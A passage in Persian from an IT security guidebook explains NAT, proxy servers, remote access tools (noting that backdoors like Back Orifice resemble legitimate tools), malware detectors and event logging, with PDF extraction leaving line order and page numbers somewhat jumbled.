‫ﺑﺮﻗﺮﺍﺭ ﻧﻤﻲﻛﻨﻨﺪ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ‬
‫ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺨﺘﻠﻔــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺍﺯ ﻣﺠﻤﻮﻋــﻪ ﺁﺩﺭﺳــﻬﺎﻱ‬
‫ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﻫﻴﭽﻴﻚ ﺍﺯ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺳـﺎﻳﺮﻳﻦ‬
‫ﺭﺍ ﺑﺒﻴﻨﻨــﺪ ﻭ ﻟــﺬﺍ ﺍﻳــﻦ ﺁﺩﺭﺳــﻬﺎﻱ ﻣــﺸﺎﺑﻪ ﻫــﻴﭻ ﻣــﺸﻜﻠﻲ ﭘﺪﻳــﺪ‬
‫ﻧﻤﻲﺁﻭﺭﻧﺪ‪.‬‬
‫ﺩﻭ ﺭﻭﺵ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﺁﺩﺭﺱ‬
‫ﺧﺼﻮﺻﻲ ﺩﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪:‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪Proxy‬‬
‫‪١١٢‬‬
‫‪NAT‬‬
‫‪١١٣‬‬
‫‪ NAT‬ﺟﺎﻳﮕﺎﻫﻲ ﺑﻴﻦ ﺷـﺒﻜﺔ ﻣﺤﻠـﻲ ﻭ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ ﻭ‬
‫ﻣﺸﺎﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ proxy‬ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺷﺒﻜﺔ ﻣﺤﻠﻲ‬
‫ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺧﺼﻮﺻﻲ ﺩﺭ ﺁﻥ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﺩ ﻣـﺮﺗﺒﻂ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﭘﻴﺎﻡ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NAT‬ﺍﺯ ﺷﺒﻜﺔ‬
‫ﻣﺤﻠﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲ ﺷﻮﺩ‪ NAT ،‬ﺁﻧﺮﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺁﺩﺭﺱ ‪ IP‬ﺧــﻮﺩ ﺍﺭﺳــﺎﻝ ﻣــﻲﻛﻨــﺪ ﻭ ﺍﻳﻨﻄــﻮﺭ ﻭﺍﻧﻤــﻮﺩ‬
‫ﻣﻲ ﻛﻨﺪ ﻛﻪ ﭘﻴﺎﻡ ﺍﺯ ﭘـﻮﺭﺗﻲ ﻓﺮﺳـﺘﺎﺩﻩ ﺷـﺪﻩ ﻛـﻪ ﺩﺭﺣـﺎﻝ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻴﺴﺖ‪ ،‬ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺎﺳﺦ ﭘﻴﺎﻡ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪،‬‬
‫ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺻﻠﻲ ﺩﺭ ﺷﺒﻜﺔ ﻣﺤﻠـﻲ ﺑـﺎﺯ ﻣـﻲﮔـﺮﺩﺩ‪NAT .‬‬
‫ﺷﺒﻴﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ proxy‬ﻋﻤﻞ ﻣﻲﻛﻨـﺪ‪ ،‬ﺍﻣـﺎ ﺑـﺮﺍﻱ‬
‫ﻫﻤﺔ ﺍﻧﻮﺍﻉ ﺗﺮﺍﻓﻴﻚ )ﻭ ﻧﻪ ﻓﻘﻂ ﺗﺮﺍﻓﻴﻚ ‪ (web‬ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ‬
‫ﺍﺯ ﻣﻜﺎﻧﻴﺰﻡ ‪ caching‬ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ ‪ proxy‬ﻧـﻮﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ‬
‫ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ ﺩﺭ ﻓـﻀﺎﻱ‬
‫ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ﺍﻣﺎ ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﻭ ﺁﺩﺭﺱ‬
‫ﺛﺎﻧﻮﻳﻪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﺩﺍﺭﺩ‪ .‬ﺍﮔـﺮ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺑﺨﻮﺍﻫﺪ ﺍﺯ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺑﺎ ﺁﺩﺭﺳﻲ ﺩﺭ ﻓـﻀﺎﻱ ﺧـﺼﻮﺻﻲ‬
‫ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺷﻮﺩ‪ ،‬ﭘﻴﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫‪ proxy‬ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﭘﻴﺎﻡ ﺭﺍ ﺑـﻪ‬
‫ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈﺮ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺳﺎﻧﺪ‪ .‬ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺩﻫﻨﺪﻩ‬
‫ﺩﺭﺧﻮﺍﺳﺖ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﻓﺮﺳـﺘﺎﺩﻥ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧـﺖ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﭘﺎﺳﺦ ﺁﻥ ﺑﺎﺯﮔـﺸﺖ ﺁﻧـﺮﺍ ﺑـﻪ ﺩﺳـﺘﮕﺎﻩ‬
‫ﺩﺭﺧﻮﺍﺳﺖﻛﻨﻨﺪﻩ ﺑﺎﺯﭘﺲ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬
‫ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﺧـﻂ ﺗﻠﻔـﻦ ﻳـﺎ‬
‫‪112 Proxy Servers‬‬
‫‪113‬‬
‫‪114‬‬
‫‪115‬‬
‫‪116‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ‪ proxy‬ﻭ ‪ NAT‬ﻫﺮ ﺩﻭ ﻣﺜﻞ ﺩﻳـﻮﺍﺭﻩﻫـﺎﻱ‬
‫ﺁﺗــﺶ ﻫــﺴﺘﻨﺪ ﻭ ﺍﺯ ﺩﺳــﺘﮕﺎﻫﻬﺎﻳﻲ ﻛــﻪ ﺩﺭ ﻓــﻀﺎﻫﺎﻱ ﺁﺩﺭﺱ‬
‫ﺧﺼﻮﺻﻲ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺩﺭ ﺑﺮﺍﺑﺮ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺑﻴﺮﻭﻧـﻲ ﻣﺤﺎﻓﻈـﺖ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ‪ ،‬ﻣﺪﻳﺮﻳﺖ‪،‬‬
‫ﻭ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬
‫ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ،١١٤‬ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣــﺪﻳﺮﻳﺖ ﺍﺯ ﺭﺍﻩ‬
‫ﺩﻭﺭ‪ ١١٥‬ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‪ ١١٦‬ﺍﻳﻦ ﺍﻣﻜـﺎﻥ ﺭﺍ ﻓـﺮﺍﻫﻢ‬
‫‪Network Address Translation‬‬
‫‪Remote Access Tools‬‬
‫‪Remote Management Tools‬‬
‫‪Remote Administration Tools‬‬
‫‪٩٧‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺑﺎ ﺍﻳﻦ ﺭﻭﺵ ﺑﻪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ‬
‫ﻣﺘﺼﻞ ﻣﻲ ﺷﻮﻳﺪ ﻣﺜﻞ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﭘﺸﺖ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺩﺳـﺘﮕﺎﻩ‬
‫ﺧﻮﺩ ﻧﺸﺴﺘﻪﺍﻳﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭼﻬﺎﺭﻡ‪:‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﻣﻬﻢ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﻧـﺪ‪.‬‬
‫ﺍﺯ ﻣﻴﺎﻥ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪:‬‬
‫•‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺍﺩﺍﺭﺓ ﺧﻮﺩ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ ﻧﺪﺍﺭﻳـﺪ‬
‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪.‬‬
‫ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻭ‬
‫ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫•‬
‫ﺍﺟﺎﺯﻩ ﻣﻲ ﺩﻫﻨﺪ ﺭﺍﻳﺎﻧـﺔ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ ﻣﻌﺎﻳﻨـﻪ ﺑـﻪ ﻳـﻚ‬
‫ﻣﺘﺨﺼﺺ ﻧﺸﺎﻥ ﺩﻫﻴﺪ؛ ﺑﺪﻭﻥ ﺁﻧﻜﻪ ﻭﻱ ﺭﺍ ﺑﻪ ﻣﺤﻞ ﻛـﺎﺭ‬
‫ﺧﻮﺩ ﺑﺒﺮﻳﺪ‪.‬‬
‫•‬
‫ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ‬
‫ﺗﻨﻬﺎ ﺑﺮ ﺭﻭﻱ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﻧﺼﺐ ﺷﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫•‬
‫ﻣﺴﺌﻮﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ‬
‫ﭼﻨﺪﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺭﺍ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﺪﻳﺮﻳﺖ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻤﻴﻦ ﻧﻴﺰ‬
‫ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺗﻤـﺎﻣﻲ ﻣـﻮﺍﺭﺩ ﺫﻛـﺮ ﺷـﺪﻩ ﺭﺍ ﺍﻧﺠـﺎﻡ‬
‫ﺩﻫﻨــﺪ‪ .‬ﺩﺭ ﺣﻘﻴﻘــﺖ ﻣﻴــﺎﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺭ‬
‫ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ ﻣــﺬﻛﻮﺭ )ﻣﺎﻧﻨــﺪ ‪ (pcAnywhere‬ﻭ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ‬
‫ﺗﺮﺍﻭﺍﻫﺎ )ﻣﺜﻞ ‪ Back Orifice‬ﻳﺎ ‪ (NetBus‬ﺗﻔﺎﻭﺕ ﻋﻤﻠﻜﺮﺩ ﭼﻨـﺪﺍﻧﻲ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ‬
‫ﻓﺮﺽ ﻛﻨﻴﻢ ﺷﻤﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻭﻳﺮﻭﺱ‬
‫ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣـﻲﺩﻫﻴـﺪ‪ ،‬ﺍﺯ ﻧﺎﻣﻬـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﺴﺘﺤﻜﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﻧﻤﺎﻳﻴـﺪ ﻭ ﻳـﻚ‬
‫ﻼ ﺍﻳﻤﻦ ﻫـﺴﺘﻴﺪ؛‬
‫ﺣﺎﻝ ﺍﮔﺮ ﺳﺆﺍﻝ ﺷﻮﺩ ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﻛﺎﺭﻫﺎ ﺁﻳﺎ ﻛﺎﻣ ﹰ‬
‫ﺦ ﻣﺜﺒﺖ ﺍﺯ ﺍﻃﻤﻴﻨﺎﻥ ﺻﺪ ﺩﺭﺻﺪﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴـﺴﺖ‪.‬‬
‫ﺑﺎﺯ ﻫﻢ ﭘﺎﺳ ﹺ‬
‫ﻫﻤﻴﺸﻪ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﺍﺭﺍﺋـﻪ ﺭﺍﻩﺣـﻞ ﺑـﺮﺍﻱ‬
‫ﻳﻚ ﺍﺷﻜﺎﻝ‪ ،‬ﺷﻤﺎ ﺍﺯ ﻫﻤـﺎﻥ ﺍﺷـﻜﺎﻝ ﺁﺳـﻴﺐ ﺑﺒﻴﻨﻴـﺪ‪ .‬ﻫﻤﭽﻨـﻴﻦ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻛﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ ﺁﻧـﺮﺍ‬
‫ﻼ ﺍﻳﻤﻦ ﺩﺍﻧﺴﺖ‪.‬‬
‫ﻛﺎﻣ ﹰ‬
‫"ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ" ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﻜﻮﻙ ‪ -‬ﺻـﺮﻓﻨﻈﺮ ﺍﺯ ﭼﮕـﻮﻧﮕﻲ ﻧـﺼﺐ ﺁﻧﻬـﺎ ‪-‬‬
‫ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﻋﻤﻠﻜﺮﺩ‬
‫ﺁﻧﻬﺎ ﺑﺎ ﺟﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻭﻳﺮﻭﺱ ﺗﺪﺍﺧﻞ ﺩﺍﺭﺩ‪ ،‬ﺯﻳﺮﺍ ﻫﺮ ﺩﻭﻱ ﺁﻧﻬـﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺩﻳـﺴﻚ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻧﻤـﻮﺩﻩ‪،‬‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛﻠﻴـﺪﻱ ﺳﻴـﺴﺘﻢ ﺑـﺼﻮﺭﺕ‬
‫ﻣﺨﻔﻴﺎﻧﻪ ﺗﻐﻴﻴﺮ ﻧﻜﺮﺩﻩ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎ ‪plug-in‬ﻫـﺎ ﻭ ‪add-on‬ﻫـﺎﻱ ﻣﺮﻭﺭﮔﺮﻫـﺎ ﺭﺍ‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ ﻭ ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺁﺳﻴﺐ ﻣﻲﺭﺳﺎﻧﺪ‬
‫ﻭ ﻳﺎ ﺑﺮﺧﻼﻑ ﻗﻮﺍﻧﻴﻦ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﺳﺖ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣـﻲﻧﻤﺎﻳﻨـﺪ‪.‬‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺍﺭﺍﻱ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩﻥ‬
‫ﺑﺪﺍﻓﺰﺍﺭﻫﺎﻱ ﺷﻨﺎﺳﺎﻳﻲﺷﺪﻩ ﻧﻴﺰ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺒﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻻ ﺯﻳـﺎﺩ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ‬
‫ﺷﻤﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﻨﺪ ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﻧﻤﻲﮔﻴﺮﻧﺪ‪ .‬ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺭﻭﻱ ﺩﻳﺴﻚ ﻗﺮﺍﺭ ﺩﺍﺭﻧـﺪ ﻭ ﺑﺮﻧﺎﻣـﻪﻫـﺎ‬
‫ﻻ ﭘﻴـﺎﻡ ﻫﻨﮕـﺎﻣﻲ ﻧﻮﺷـﺘﻪ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﺁﻥ ﭘﻴﺎﻡ ﺑﻨﻮﻳﺴﻨﺪ‪ .‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺍﺗﻔﺎﻕ ﺭﺥ ﻣﻲﺩﻫﺪ ﻳﺎ ﺍﺷﻜﺎﻟﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ‪.‬‬
‫ﻗﺎﻧﻮﻥ ﺑﻴﺴﺖ ﻭ ﭘﻨﺠﻢ‪:‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺗﻮﺍﺑﻊ ﺳﻴﺴﺘﻢ ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻓﻌﺎﻝ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺛﺒﺖ ﺷﻮﻧﺪ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫•‬
‫ﺭﺍﻳﺎﻧﻪ ﺭﻭﺷﻦ ﺷﺪ؛‬
‫•‬
‫ﺷﺨﺼﻲ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﺪ؛‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻣﻜﺎﻧﺎﺕ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑـﺮﺍﻱ ﻛﻨﺘـﺮﻝ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺯ ﺍﻳﻤﻨﻲ‬
‫ﻻﺯﻡ )ﻧﺎﻣﻬـــﺎﻱ ﻛـــﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫـــﺎﻱ ﻋﺒـــﻮﺭ ﻣﻨﺎﺳـــﺐ(‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ‪ ،‬ﺗﺎ ﻣﻬﺎﺟﻤﻴﻦ ﻧﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻋﻠﻴﻪ‬
‫ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﻨﺎﺳﺐ ﺭﺍ ﻧﻴﺰ ﺑﺮﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺑﻜﺎﺭ‬
‫ﻣﻲﺑﺮﻳﺪ‪.‬‬
‫‪٩٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫•‬
‫ﺷﺨﺼﻲ ﺳﻌﻲ ﺩﺍﺷﺖ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﺩ ﺍﻣـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﻭﻱ ﺍﺷﺘﺒﺎﻩ ﺑﻮﺩ؛‬
‫•‬
‫ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﺷﺪ؛‬
‫•‬
‫ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣـﻲﺧﻮﺍﺳـﺖ ﻓﺮﺳـﺘﺎﺩﻩ ﺷـﻮﺩ ﺍﻣـﺎ‬
‫ﺍﺭﺗﺒﺎﻁ ﻗﻄﻊ ﺷﺪ؛‬
‫•‬
‫ﺧﻄﺎﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺭﻭﻱ ﺩﻳﺴﻚ )ﻳﺎ ﺍﺭﺗﺒﺎﻁ ﺷـﺒﻜﻪﺍﻱ( ﭘـﻴﺶ‬
‫ﺁﻣﺪ؛‬
‫•‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻳﻚ ﺍﺭﺗﺒـﺎﻁ ﻏﻴﺮﻣﺠـﺎﺯ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﺁﻧـﺮﺍ‬
‫ﻣﺴﺪﻭﺩ ﻛﺮﺩ؛‬
‫•‬
‫ﺟﺴﺘﺠﻮﮔﺮ ﻭﻳﺮﻭﺱ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﻣﺠﻤﻮﻋـﺔ ﺟﺪﻳـﺪﻱ ﺍﺯ‬
‫ﻧﺸﺎﻧﻬﺎﻱ ﻭﻳﺮﻭﺱ ﺭﺍ ‪ download‬ﻧﻤﻮﺩ؛‬
‫•‬
‫ﻳﻚ ﻭﻳﺮﻭﺱﻳﺎﺏ ﺗﻤﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟـﻮﺩ ﺩﺭ ﺳﻴـﺴﺘﻢ ﺭﺍ‬
